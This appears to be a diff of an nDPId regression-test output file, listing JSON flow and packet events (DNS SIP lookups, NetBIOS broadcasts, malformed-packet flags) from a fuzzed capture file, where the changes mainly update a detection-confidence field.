00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1120470868714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470868714,"pkt":"ADB0ADRWAODtAW69CABFAABIa8kAAIARS4jAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470865712,"flow_last_seen":1120470868714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470868714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":563,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470865712,"flow_last_seen":1120470870717,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470870717,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cxbercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":564,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.qk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470865712,"flow_last_seen":1120470868714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470868714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":563,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470865712,"flow_last_seen":1120470870717,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470870717,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cxbercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":564,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.qk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1120470882724} 00395{"packet_event_id":1,"packet_event_name":"packet","packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470877496,"pkt":"ADBUADRWAODtAW69CAhFAABEa88AAIARS4bCqAECwKgBAQr3ADUAMHGrsxwAAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1120470882726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470882726,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvcAR1QnsxyAAAABAAEAAAAAASVzAAEwAzEyNwdpbi1hZGRyBGF2cGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470882846,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1120470882846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470882846,"pkt":"ADBUADRWAODtAW69CABFAABIa9EAAIARS4DAqAECwKgBAQr4lzUAND6uRB4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1120470883845,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470883845,"pkt":"ADBUADRWAODtAW69CABFAABIa9IAAIARS3\/AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAHghAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1120470885848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69CABFAABIa9MAAIARS37AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43392,"global_ts_msec":1120470887851} 00401{"packet_event_id":1,"packet_event_name":"packet","packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43392,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69qYBFAABI\/dQAAIARS33AqAECwKgBAXP4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaWJ5AmRrAAAhAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1120470891857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470891857,"pkt":"ADBUADRWAODtAW69CABFAABIa1YAAIARS3zAqAECwKgBAUr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1120470899859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470899859,"pkt":"ADBUADRWAODtAW69CABFAABEVdYAAIARS3\/AqAECwKgBAQr5ADUAMKjFfAAAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1120470899861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470899861,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvkAR4tBfACAAAABAgEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 